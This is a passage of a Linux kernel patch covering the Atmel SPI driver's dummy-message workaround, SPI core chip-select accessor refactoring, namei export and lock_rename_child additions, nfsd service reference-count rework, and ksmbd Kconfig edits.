+  * Version 2 of the SPI controller has
+  *  - CR.LASTXFER
+@@ -303,6 +321,43 @@ static bool atmel_spi_is_v2(struct atmel_spi *as)
+ 	return as->caps.is_spi2;
+ }
+ 
++/*
++ * Send a dummy message.
++ *
++ * This is sometimes needed when using a CS GPIO to force clock transition when
++ * switching between devices with different polarities.
++ */
++static void atmel_spi_send_dummy(struct atmel_spi *as, struct spi_device *spi, int chip_select)
++{
++	u32 status;
++	u32 csr;
++
++	/*
++	 * Set a clock frequency to allow sending message on SPI bus.
++	 * The frequency here can be anything, but is needed for
++	 * the controller to send the data.
++	 */
++	csr = spi_readl(as, CSR0 + 4 * chip_select);
++	csr = SPI_BFINS(SCBR, DUMMY_MSG_FREQUENCY, csr);
++	spi_writel(as, CSR0 + 4 * chip_select, csr);
++
++	/*
++	 * Read all data coming from SPI bus, needed to be able to send
++	 * the message.
++	 */
++	spi_readl(as, RDR);
++	while (spi_readl(as, SR) & SPI_BIT(RDRF)) {
++		spi_readl(as, RDR);
++		cpu_relax();
++	}
++
++	spi_writel(as, TDR, DUMMY_MSG);
++
++	readl_poll_timeout_atomic(as->regs + SPI_SR, status,
++				  (status & SPI_BIT(TXEMPTY)), 1, 1000);
++}
++
++
+ /*
+  * Earlier SPI controllers (e.g. on at91rm9200) have a design bug whereby
+  * they assume that spi slave device state will not change on deselect, so
+@@ -319,11 +374,17 @@ static bool atmel_spi_is_v2(struct atmel_spi *as)
+  * Master on Chip Select 0.")  No workaround exists for that ... so for
+  * nCS0 on that chip, we (a) don't use the GPIO, (b) can't support CS_HIGH,
+  * and (c) will trigger that first erratum in some cases.
++ *
++ * When changing the clock polarity, the SPI controller waits for the next
++ * transmission to enforce the default clock state. This may be an issue when
++ * using a GPIO as Chip Select: the clock level is applied only when the first
++ * packet is sent, once the CS has already been asserted. The workaround is to
++ * avoid this by sending a first (dummy) message before toggling the CS state.
+  */
+-
+ static void cs_activate(struct atmel_spi *as, struct spi_device *spi)
+ {
+ 	struct atmel_spi_device *asd = spi->controller_state;
++	bool new_polarity;
+ 	int chip_select;
+ 	u32 mr;
+ 
+@@ -352,6 +413,25 @@ static void cs_activate(struct atmel_spi *as, struct spi_device *spi)
+ 		}
+ 
+ 		mr = spi_readl(as, MR);
++
++		/*
++		 * Ensures the clock polarity is valid before we actually
++		 * assert the CS to avoid spurious clock edges to be
++		 * processed by the spi devices.
++		 */
++		if (spi_get_csgpiod(spi, 0)) {
++			new_polarity = (asd->csr & SPI_BIT(CPOL)) != 0;
++			if (new_polarity != as->last_polarity) {
++				/*
++				 * Need to disable the GPIO before sending the dummy
++				 * message because it is already set by the spi core.
++				 */
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), 0);
++				atmel_spi_send_dummy(as, spi, chip_select);
++				as->last_polarity = new_polarity;
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), 1);
++			}
++		}
+ 	} else {
+ 		u32 cpol = (spi->mode & SPI_CPOL) ? SPI_BIT(CPOL) : 0;
+ 		int i;
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 5d046be8b2dd5..22d227878bc44 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -360,6 +360,18 @@ const struct spi_device_id *spi_get_device_id(const struct spi_device *sdev)
+ }
+ EXPORT_SYMBOL_GPL(spi_get_device_id);
+ 
++const void *spi_get_device_match_data(const struct spi_device *sdev)
++{
++	const void *match;
++
++	match = device_get_match_data(&sdev->dev);
++	if (match)
++		return match;
++
++	return (const void *)spi_get_device_id(sdev)->driver_data;
++}
++EXPORT_SYMBOL_GPL(spi_get_device_match_data);
++
+ static int spi_match_device(struct device *dev, struct device_driver *drv)
+ {
+ 	const struct spi_device	*spi = to_spi_device(dev);
+@@ -592,7 +604,7 @@ static void spi_dev_set_name(struct spi_device *spi)
+ 	}
+ 
+ 	dev_set_name(&spi->dev, "%s.%u", dev_name(&spi->controller->dev),
+-		     spi->chip_select);
++		     spi_get_chipselect(spi, 0));
+ }
+ 
+ static int spi_dev_check(struct device *dev, void *data)
+@@ -601,7 +613,7 @@ static int spi_dev_check(struct device *dev, void *data)
+ 	struct spi_device *new_spi = data;
+ 
+ 	if (spi->controller == new_spi->controller &&
+-	    spi->chip_select == new_spi->chip_select)
++	    spi_get_chipselect(spi, 0) == spi_get_chipselect(new_spi, 0))
+ 		return -EBUSY;
+ 	return 0;
+ }
+@@ -626,7 +638,7 @@ static int __spi_add_device(struct spi_device *spi)
+ 	status = bus_for_each_dev(&spi_bus_type, NULL, spi, spi_dev_check);
+ 	if (status) {
+ 		dev_err(dev, "chipselect %d already in use\n",
+-				spi->chip_select);
++				spi_get_chipselect(spi, 0));
+ 		return status;
+ 	}
+ 
+@@ -637,7 +649,7 @@ static int __spi_add_device(struct spi_device *spi)
+ 	}
+ 
+ 	if (ctlr->cs_gpiods)
+-		spi->cs_gpiod = ctlr->cs_gpiods[spi->chip_select];
++		spi_set_csgpiod(spi, 0, ctlr->cs_gpiods[spi_get_chipselect(spi, 0)]);
+ 
+ 	/*
+ 	 * Drivers may modify this initial i/o setup, but will
+@@ -680,8 +692,8 @@ int spi_add_device(struct spi_device *spi)
+ 	int status;
+ 
+ 	/* Chipselects are numbered 0..max; validate. */
+-	if (spi->chip_select >= ctlr->num_chipselect) {
+-		dev_err(dev, "cs%d >= max %d\n", spi->chip_select,
++	if (spi_get_chipselect(spi, 0) >= ctlr->num_chipselect) {
++		dev_err(dev, "cs%d >= max %d\n", spi_get_chipselect(spi, 0),
+ 			ctlr->num_chipselect);
+ 		return -EINVAL;
+ 	}
+@@ -702,8 +714,8 @@ static int spi_add_device_locked(struct spi_device *spi)
+ 	struct device *dev = ctlr->dev.parent;
+ 
+ 	/* Chipselects are numbered 0..max; validate. */
+-	if (spi->chip_select >= ctlr->num_chipselect) {
+-		dev_err(dev, "cs%d >= max %d\n", spi->chip_select,
++	if (spi_get_chipselect(spi, 0) >= ctlr->num_chipselect) {
++		dev_err(dev, "cs%d >= max %d\n", spi_get_chipselect(spi, 0),
+ 			ctlr->num_chipselect);
+ 		return -EINVAL;
+ 	}
+@@ -749,7 +761,7 @@ struct spi_device *spi_new_device(struct spi_controller *ctlr,
+ 
+ 	WARN_ON(strlen(chip->modalias) >= sizeof(proxy->modalias));
+ 
+-	proxy->chip_select = chip->chip_select;
++	spi_set_chipselect(proxy, 0, chip->chip_select);
+ 	proxy->max_speed_hz = chip->max_speed_hz;
+ 	proxy->mode = chip->mode;
+ 	proxy->irq = chip->irq;
+@@ -958,24 +970,23 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 	 * Avoid calling into the driver (or doing delays) if the chip select
+ 	 * isn't actually changing from the last time this was called.
+ 	 */
+-	if (!force && ((enable && spi->controller->last_cs == spi->chip_select) ||
+-				(!enable && spi->controller->last_cs != spi->chip_select)) &&
++	if (!force && ((enable && spi->controller->last_cs == spi_get_chipselect(spi, 0)) ||
++		       (!enable && spi->controller->last_cs != spi_get_chipselect(spi, 0))) &&
+ 	    (spi->controller->last_cs_mode_high == (spi->mode & SPI_CS_HIGH)))
+ 		return;
+ 
+ 	trace_spi_set_cs(spi, activate);
+ 
+-	spi->controller->last_cs = enable ? spi->chip_select : -1;
++	spi->controller->last_cs = enable ? spi_get_chipselect(spi, 0) : -1;
+ 	spi->controller->last_cs_mode_high = spi->mode & SPI_CS_HIGH;
+ 
+-	if ((spi->cs_gpiod || !spi->controller->set_cs_timing) && !activate) {
++	if ((spi_get_csgpiod(spi, 0) || !spi->controller->set_cs_timing) && !activate)
+ 		spi_delay_exec(&spi->cs_hold, NULL);
+-	}
+ 
+ 	if (spi->mode & SPI_CS_HIGH)
+ 		enable = !enable;
+ 
+-	if (spi->cs_gpiod) {
++	if (spi_get_csgpiod(spi, 0)) {
+ 		if (!(spi->mode & SPI_NO_CS)) {
+ 			/*
+ 			 * Historically ACPI has no means of the GPIO polarity and
+@@ -988,10 +999,10 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 			 * into account.
+ 			 */
+ 			if (has_acpi_companion(&spi->dev))
+-				gpiod_set_value_cansleep(spi->cs_gpiod, !enable);
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), !enable);
+ 			else
+ 				/* Polarity handled by GPIO library */
+-				gpiod_set_value_cansleep(spi->cs_gpiod, activate);
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), activate);
+ 		}
+ 		/* Some SPI masters need both GPIO CS & slave_select */
+ 		if ((spi->controller->flags & SPI_MASTER_GPIO_SS) &&
+@@ -1001,7 +1012,7 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 		spi->controller->set_cs(spi, !enable);
+ 	}
+ 
+-	if (spi->cs_gpiod || !spi->controller->set_cs_timing) {
++	if (spi_get_csgpiod(spi, 0) || !spi->controller->set_cs_timing) {
+ 		if (activate)
+ 			spi_delay_exec(&spi->cs_setup, NULL);
+ 		else
+@@ -2291,7 +2302,7 @@ static int of_spi_parse_dt(struct spi_controller *ctlr, struct spi_device *spi,
+ 			nc, rc);
+ 		return rc;
+ 	}
+-	spi->chip_select = value;
++	spi_set_chipselect(spi, 0, value);
+ 
+ 	/* Device speed */
+ 	if (!of_property_read_u32(nc, "spi-max-frequency", &value))
+@@ -2405,7 +2416,7 @@ struct spi_device *spi_new_ancillary_device(struct spi_device *spi,
+ 	strscpy(ancillary->modalias, "dummy", sizeof(ancillary->modalias));
+ 
+ 	/* Use provided chip-select for ancillary device */
+-	ancillary->chip_select = chip_select;
++	spi_set_chipselect(ancillary, 0, chip_select);
+ 
+ 	/* Take over SPI mode/speed from SPI main device */
+ 	ancillary->max_speed_hz = spi->max_speed_hz;
+@@ -2652,7 +2663,7 @@ struct spi_device *acpi_spi_device_alloc(struct spi_controller *ctlr,
+ 	spi->mode		|= lookup.mode;
+ 	spi->irq		= lookup.irq;
+ 	spi->bits_per_word	= lookup.bits_per_word;
+-	spi->chip_select	= lookup.chip_select;
++	spi_set_chipselect(spi, 0, lookup.chip_select);
+ 
+ 	return spi;
+ }
+@@ -3611,6 +3622,37 @@ static int __spi_validate_bits_per_word(struct spi_controller *ctlr,
+ 	return 0;
+ }
+ 
++/**
++ * spi_set_cs_timing - configure CS setup, hold, and inactive delays
++ * @spi: the device that requires specific CS timing configuration
++ *
++ * Return: zero on success, else a negative error code.
++ */
++static int spi_set_cs_timing(struct spi_device *spi)
++{
++	struct device *parent = spi->controller->dev.parent;
++	int status = 0;
++
++	if (spi->controller->set_cs_timing && !spi_get_csgpiod(spi, 0)) {
++		if (spi->controller->auto_runtime_pm) {
++			status = pm_runtime_get_sync(parent);
++			if (status < 0) {
++				pm_runtime_put_noidle(parent);
++				dev_err(&spi->controller->dev, "Failed to power device: %d\n",
++					status);
++				return status;
++			}
++
++			status = spi->controller->set_cs_timing(spi);
++			pm_runtime_mark_last_busy(parent);
++			pm_runtime_put_autosuspend(parent);
++		} else {
++			status = spi->controller->set_cs_timing(spi);
++		}
++	}
++	return status;
++}
++
+ /**
+  * spi_setup - setup SPI mode and clock rate
+  * @spi: the device whose settings are being modified
+@@ -3707,6 +3749,12 @@ int spi_setup(struct spi_device *spi)
+ 		}
+ 	}
+ 
++	status = spi_set_cs_timing(spi);
++	if (status) {
++		mutex_unlock(&spi->controller->io_mutex);
++		return status;
++	}
++
+ 	if (spi->controller->auto_runtime_pm && spi->controller->set_cs) {
+ 		status = pm_runtime_resume_and_get(spi->controller->dev.parent);
+ 		if (status < 0) {
+@@ -3790,7 +3838,7 @@ static int __spi_validate(struct spi_device *spi, struct spi_message *message)
+ 	 * cs_change is set for each transfer.
+ 	 */
+ 	if ((spi->mode & SPI_CS_WORD) && (!(ctlr->mode_bits & SPI_CS_WORD) ||
+-					  spi->cs_gpiod)) {
++					  spi_get_csgpiod(spi, 0))) {
+ 		size_t maxsize;
+ 		int ret;
+ 
+diff --git a/drivers/usb/host/fotg210-hcd.c b/drivers/usb/host/fotg210-hcd.c
+index c4c1fbc12b4cd..dc968960769e1 100644
+--- a/drivers/usb/host/fotg210-hcd.c
++++ b/drivers/usb/host/fotg210-hcd.c
+@@ -429,8 +429,6 @@ static void qh_lines(struct fotg210_hcd *fotg210, struct fotg210_qh *qh,
+ 			temp = size;
+ 		size -= temp;
+ 		next += temp;
+-		if (temp == size)
+-			goto done;
+ 	}
+ 
+ 	temp = snprintf(next, size, "\n");
+@@ -440,7 +438,6 @@ static void qh_lines(struct fotg210_hcd *fotg210, struct fotg210_qh *qh,
+ 	size -= temp;
+ 	next += temp;
+ 
+-done:
+ 	*sizep = size;
+ 	*nextp = next;
+ }
+diff --git a/fs/namei.c b/fs/namei.c
+index 5e1c2ab2ae709..b5578f4ce5d6e 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -253,6 +253,7 @@ getname_kernel(const char * filename)
+ 
+ 	return result;
+ }
++EXPORT_SYMBOL(getname_kernel);
+ 
+ void putname(struct filename *name)
+ {
+@@ -271,6 +272,7 @@ void putname(struct filename *name)
+ 	} else
+ 		__putname(name);
+ }
++EXPORT_SYMBOL(putname);
+ 
+ /**
+  * check_acl - perform ACL permission checking
+@@ -1581,8 +1583,9 @@ static struct dentry *lookup_dcache(const struct qstr *name,
+  * when directory is guaranteed to have no in-lookup children
+  * at all.
+  */
+-static struct dentry *__lookup_hash(const struct qstr *name,
+-		struct dentry *base, unsigned int flags)
++struct dentry *lookup_one_qstr_excl(const struct qstr *name,
++				    struct dentry *base,
++				    unsigned int flags)
+ {
+ 	struct dentry *dentry = lookup_dcache(name, base, flags);
+ 	struct dentry *old;
+@@ -1606,6 +1609,7 @@ static struct dentry *__lookup_hash(const struct qstr *name,
+ 	}
+ 	return dentry;
+ }
++EXPORT_SYMBOL(lookup_one_qstr_excl);
+ 
+ static struct dentry *lookup_fast(struct nameidata *nd)
+ {
+@@ -2532,16 +2536,17 @@ static int path_parentat(struct nameidata *nd, unsigned flags,
+ }
+ 
+ /* Note: this does not consume "name" */
+-static int filename_parentat(int dfd, struct filename *name,
+-			     unsigned int flags, struct path *parent,
+-			     struct qstr *last, int *type)
++static int __filename_parentat(int dfd, struct filename *name,
++			       unsigned int flags, struct path *parent,
++			       struct qstr *last, int *type,
++			       const struct path *root)
+ {
+ 	int retval;
+ 	struct nameidata nd;
+ 
+ 	if (IS_ERR(name))
+ 		return PTR_ERR(name);
+-	set_nameidata(&nd, dfd, name, NULL);
++	set_nameidata(&nd, dfd, name, root);
+ 	retval = path_parentat(&nd, flags | LOOKUP_RCU, parent);
+ 	if (unlikely(retval == -ECHILD))
+ 		retval = path_parentat(&nd, flags, parent);
+@@ -2556,6 +2561,13 @@ static int filename_parentat(int dfd, struct filename *name,
+ 	return retval;
+ }
+ 
++static int filename_parentat(int dfd, struct filename *name,
++			     unsigned int flags, struct path *parent,
++			     struct qstr *last, int *type)
++{
++	return __filename_parentat(dfd, name, flags, parent, last, type, NULL);
++}
++
+ /* does lookup, returns the object with parent locked */
+ static struct dentry *__kern_path_locked(struct filename *name, struct path *path)
+ {
+@@ -2571,7 +2583,7 @@ static struct dentry *__kern_path_locked(struct filename *name, struct path *pat
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 	inode_lock_nested(path->dentry->d_inode, I_MUTEX_PARENT);
+-	d = __lookup_hash(&last, path->dentry, 0);
++	d = lookup_one_qstr_excl(&last, path->dentry, 0);
+ 	if (IS_ERR(d)) {
+ 		inode_unlock(path->dentry->d_inode);
+ 		path_put(path);
+@@ -2599,6 +2611,24 @@ int kern_path(const char *name, unsigned int flags, struct path *path)
+ }
+ EXPORT_SYMBOL(kern_path);
+ 
++/**
++ * vfs_path_parent_lookup - lookup a parent path relative to a dentry-vfsmount pair
++ * @filename: filename structure
++ * @flags: lookup flags
++ * @parent: pointer to struct path to fill
++ * @last: last component
++ * @type: type of the last component
++ * @root: pointer to struct path of the base directory
++ */
++int vfs_path_parent_lookup(struct filename *filename, unsigned int flags,
++			   struct path *parent, struct qstr *last, int *type,
++			   const struct path *root)
++{
++	return  __filename_parentat(AT_FDCWD, filename, flags, parent, last,
++				    type, root);
++}
++EXPORT_SYMBOL(vfs_path_parent_lookup);
++
+ /**
+  * vfs_path_lookup - lookup a file path relative to a dentry-vfsmount pair
+  * @dentry:  pointer to dentry of the base directory
+@@ -2980,20 +3010,10 @@ static inline int may_create(struct user_namespace *mnt_userns,
+ 	return inode_permission(mnt_userns, dir, MAY_WRITE | MAY_EXEC);
+ }
+ 
+-/*
+- * p1 and p2 should be directories on the same fs.
+- */
+-struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
++static struct dentry *lock_two_directories(struct dentry *p1, struct dentry *p2)
+ {
+ 	struct dentry *p;
+ 
+-	if (p1 == p2) {
+-		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-		return NULL;
+-	}
+-
+-	mutex_lock(&p1->d_sb->s_vfs_rename_mutex);
+-
+ 	p = d_ancestor(p2, p1);
+ 	if (p) {
+ 		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
+@@ -3012,8 +3032,64 @@ struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
+ 			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+ 	return NULL;
+ }
++
++/*
++ * p1 and p2 should be directories on the same fs.
++ */
++struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
++{
++	if (p1 == p2) {
++		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
++		return NULL;
++	}
++
++	mutex_lock(&p1->d_sb->s_vfs_rename_mutex);
++	return lock_two_directories(p1, p2);
++}
+ EXPORT_SYMBOL(lock_rename);
+ 
++/*
++ * c1 and p2 should be on the same fs.
++ */
++struct dentry *lock_rename_child(struct dentry *c1, struct dentry *p2)
++{
++	if (READ_ONCE(c1->d_parent) == p2) {
++		/*
++		 * hopefully won't need to touch ->s_vfs_rename_mutex at all.
++		 */
++		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
++		/*
++		 * now that p2 is locked, nobody can move in or out of it,
++		 * so the test below is safe.
++		 */
++		if (likely(c1->d_parent == p2))
++			return NULL;
++
++		/*
++		 * c1 got moved out of p2 while we'd been taking locks;
++		 * unlock and fall back to slow case.
++		 */
++		inode_unlock(p2->d_inode);
++	}
++
++	mutex_lock(&c1->d_sb->s_vfs_rename_mutex);
++	/*
++	 * nobody can move out of any directories on this fs.
++	 */
++	if (likely(c1->d_parent != p2))
++		return lock_two_directories(c1->d_parent, p2);
++
++	/*
++	 * c1 got moved into p2 while we were taking locks;
++	 * we need p2 locked and ->s_vfs_rename_mutex unlocked,
++	 * for consistency with lock_rename().
++	 */
++	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
++	mutex_unlock(&c1->d_sb->s_vfs_rename_mutex);
++	return NULL;
++}
++EXPORT_SYMBOL(lock_rename_child);
++
+ void unlock_rename(struct dentry *p1, struct dentry *p2)
+ {
+ 	inode_unlock(p1->d_inode);
+@@ -3806,7 +3882,8 @@ static struct dentry *filename_create(int dfd, struct filename *name,
+ 	if (last.name[last.len] && !want_dir)
+ 		create_flags = 0;
+ 	inode_lock_nested(path->dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path->dentry, reval_flag | create_flags);
++	dentry = lookup_one_qstr_excl(&last, path->dentry,
++				      reval_flag | create_flags);
+ 	if (IS_ERR(dentry))
+ 		goto unlock;
+ 
+@@ -4168,7 +4245,7 @@ retry:
+ 		goto exit2;
+ 
+ 	inode_lock_nested(path.dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path.dentry, lookup_flags);
++	dentry = lookup_one_qstr_excl(&last, path.dentry, lookup_flags);
+ 	error = PTR_ERR(dentry);
+ 	if (IS_ERR(dentry))
+ 		goto exit3;
+@@ -4302,7 +4379,7 @@ retry:
+ 		goto exit2;
+ retry_deleg:
+ 	inode_lock_nested(path.dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path.dentry, lookup_flags);
++	dentry = lookup_one_qstr_excl(&last, path.dentry, lookup_flags);
+ 	error = PTR_ERR(dentry);
+ 	if (!IS_ERR(dentry)) {
+ 		struct user_namespace *mnt_userns;
+@@ -4876,7 +4953,8 @@ retry:
+ retry_deleg:
+ 	trap = lock_rename(new_path.dentry, old_path.dentry);
+ 
+-	old_dentry = __lookup_hash(&old_last, old_path.dentry, lookup_flags);
++	old_dentry = lookup_one_qstr_excl(&old_last, old_path.dentry,
++					  lookup_flags);
+ 	error = PTR_ERR(old_dentry);
+ 	if (IS_ERR(old_dentry))
+ 		goto exit3;
+@@ -4884,7 +4962,8 @@ retry_deleg:
+ 	error = -ENOENT;
+ 	if (d_is_negative(old_dentry))
+ 		goto exit4;
+-	new_dentry = __lookup_hash(&new_last, new_path.dentry, lookup_flags | target_flags);
++	new_dentry = lookup_one_qstr_excl(&new_last, new_path.dentry,
++					  lookup_flags | target_flags);
+ 	error = PTR_ERR(new_dentry);
+ 	if (IS_ERR(new_dentry))
+ 		goto exit4;
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 573de0d49e172..b3b4542e31ed5 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -716,8 +716,10 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 
+ 	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err >= 0 &&
+-	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++	if (err < 0 && !nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++	else if (err >= 0 &&
++		 !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+ 		svc_get(nn->nfsd_serv);
+ 
+ 	nfsd_put(net);
+@@ -767,6 +769,9 @@ out_close:
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
++	if (!nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++
+ 	nfsd_put(net);
+ 	return err;
+ }
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 09726c5b9a317..53166cce7062c 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,7 +97,12 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-void		nfsd_put(struct net *net);
++static inline void nfsd_put(struct net *net)
++{
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++
++	svc_put(nn->nfsd_serv);
++}
+ 
+ bool		i_am_nfsd(void);
+ 
+@@ -134,6 +139,7 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
++void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index f6cc99af81925..350c6c72f793f 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -523,9 +523,14 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
++void nfsd_last_thread(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv = nn->nfsd_serv;
++
++	spin_lock(&nfsd_notifier_lock);
++	nn->nfsd_serv = NULL;
++	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -535,6 +540,8 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ #endif
+ 	}
+ 
++	svc_xprt_destroy_all(serv, net);
++
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -625,7 +632,8 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_put(net);
++	nfsd_last_thread(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -655,9 +663,6 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
+-		/* NOT nfsd_put() as notifiers (see below) haven't
+-		 * been set up yet.
+-		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -700,29 +705,6 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
+-/* This is the callback for kref_put() below.
+- * There is no code here as the first thing to be done is
+- * call svc_shutdown_net(), but we cannot get the 'net' from
+- * the kref.  So do all the work when kref_put returns true.
+- */
+-static void nfsd_noop(struct kref *ref)
+-{
+-}
+-
+-void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
+-		svc_xprt_destroy_all(nn->nfsd_serv, net);
+-		nfsd_last_thread(nn->nfsd_serv, net);
+-		svc_destroy(&nn->nfsd_serv->sv_refcnt);
+-		spin_lock(&nfsd_notifier_lock);
+-		nn->nfsd_serv = NULL;
+-		spin_unlock(&nfsd_notifier_lock);
+-	}
+-}
+-
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -773,7 +755,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	nfsd_put(net);
++	svc_put(nn->nfsd_serv);
+ 	return err;
+ }
+ 
+@@ -788,6 +770,7 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	int	error;
+ 	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -807,22 +790,25 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 		goto out;
+ 
+ 	nfsd_up_before = nn->nfsd_net_up;
++	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
++	error = svc_set_num_threads(serv, NULL, nrservs);
+ 	if (error)
+ 		goto out_shutdown;
+-	error = nn->nfsd_serv->sv_nrthreads;
++	error = serv->sv_nrthreads;
++	if (error == 0)
++		nfsd_last_thread(net);
+ out_shutdown:
+ 	if (error < 0 && !nfsd_up_before)
+ 		nfsd_shutdown_net(net);
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		nfsd_put(net);
+-	nfsd_put(net);
++		svc_put(serv);
++	svc_put(serv);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+@@ -1138,11 +1124,12 @@ int nfsd_pool_stats_open(struct inode *inode, struct file *file)
+ 
+ int nfsd_pool_stats_release(struct inode *inode, struct file *file)
+ {
++	struct seq_file *seq = file->private_data;
++	struct svc_serv *serv = seq->private;
+ 	int ret = seq_release(inode, file);
+-	struct net *net = inode->i_sb->s_fs_info;
+ 
+ 	mutex_lock(&nfsd_mutex);
+-	nfsd_put(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ 	return ret;
+ }
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index c8a4014f9d395..07549957b3099 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -1196,6 +1196,7 @@ struct create_posix {
+ #define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
+ 
+ #define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
++#define SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE	cpu_to_le32(0x04)
+ 
+ #define SMB2_LEASE_KEY_SIZE			16
+ 
+diff --git a/fs/smb/server/Kconfig b/fs/smb/server/Kconfig
+index e1fe17747ed69..d036ab80fec35 100644
+--- a/fs/smb/server/Kconfig
++++ b/fs/smb/server/Kconfig
+@@ -1,5 +1,5 @@
+ config SMB_SERVER
+-	tristate "SMB3 server support (EXPERIMENTAL)"
++	tristate "SMB3 server support"
+ 	depends on INET
+ 	depends on MULTIUSER
+ 	depends on FILE_LOCKING
+@@ -33,14 +33,16 @@ config SMB_SERVER
+ 	  in ksmbd-tools, available from
+ 	  https://github.com/cifsd-team/ksmbd-tools.
+ 	  More detail about how to run the ksmbd kernel server is
+-	  available via README file
++	  available via the README file
+ 	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
+ 
+ 	  ksmbd kernel server includes support for auto-negotiation,
+ 	  Secure negotiate, Pre-authentication integrity, oplock/lease,
+ 	  compound requests, multi-credit, packet signing, RDMA(smbdirect),
+ 	  smb3 encryption, copy-offload, secure per-user session
+-	  establishment via NTLM or NTLMv2.
++	  establishment via Kerberos or NTLMv2.
++
++if SMB_SERVER
+ 
